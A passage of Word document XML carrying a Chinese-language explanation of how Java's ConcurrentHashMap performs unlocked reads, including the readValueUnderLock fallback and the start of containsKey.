          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>变量，由于所有的修改操作在进行结构修改时都会在最后一步写</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>count</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>变量，通过这种机制保证</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>操作能够得到几乎最新的结构更新。对于非结构更新，也就是结点值的改变，由于</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>HashEntry</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>变量是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>volatile</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的，也能保证读取到最新的值。接下来就是对</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>链进行遍历找到要获取的结点，如果没有找到，直接访回</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>。对</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>链进行遍历不需要加锁的原因在于链指针</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>next</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>final</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的。但是头指针却不是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>final</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的，这是通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>getFirst(hash)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>方法返回，也就是存在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>table</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>数组中的值。这使得</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>getFirst(hash)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>可能返回过时的头结点，例如，当执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>方法时，刚执行完</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>getFirst(hash)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>之后，另一个线程执行了删除操作并更新头结点，这就导致</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>方法中返回的头结点不是最新的。这是可以允许，通过对</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>count</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>变量的协调机制，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>能读取到几乎最新的数据，虽然可能不是最新的。要得到最新的数据，只有采用完全的同步。</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最后，如果找到了所求的结点，判断它的值如果非空就直接返回，否则在有锁的状态下再读一次。这似乎有些费解，理论上结点的值不可能为空，这是因为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>put</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的时候就进行了判断，如果为空就要抛</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>NullPointerException</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>。空值的唯一源头就是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>HashEntry</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>中的默认值，因为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>HashEntry</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>中的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>不是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>final</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的，非同步读取有可能读取到空值。仔细看下</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>put</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>操作的语句：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>tab[index] = new HashEntry&lt;K,V&gt;(key, hash, first, value)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，在这条语句中，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>HashEntry</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>构造函数中对</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的赋值以及对</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>tab[index]</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的赋值可能被重新排序，这就可能导致结点的值为空。这种情况应当很罕见，一旦发生这种情况，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ConcurrentHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>采取的方式是在持有锁的情况下再读一遍，这能够保证读到最新的值，并且一定不会为空值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>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V readValueUnderLock(HashEntry&lt;K,V&gt; e) {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>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lock();  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>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try</w:t>
      </w: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3"/>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return</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> e.value;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>finally</w:t>
      </w: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3"/>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unlock();  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>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3"/>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p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00573A3A">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFEFEF"/>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另一个操作是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>containsKey</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，这个实现就要简单得多了，因为它不需要读取值：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>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b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>boolean</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> containsKey(Object key, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> hash) {  </w:t>
      </w:r>
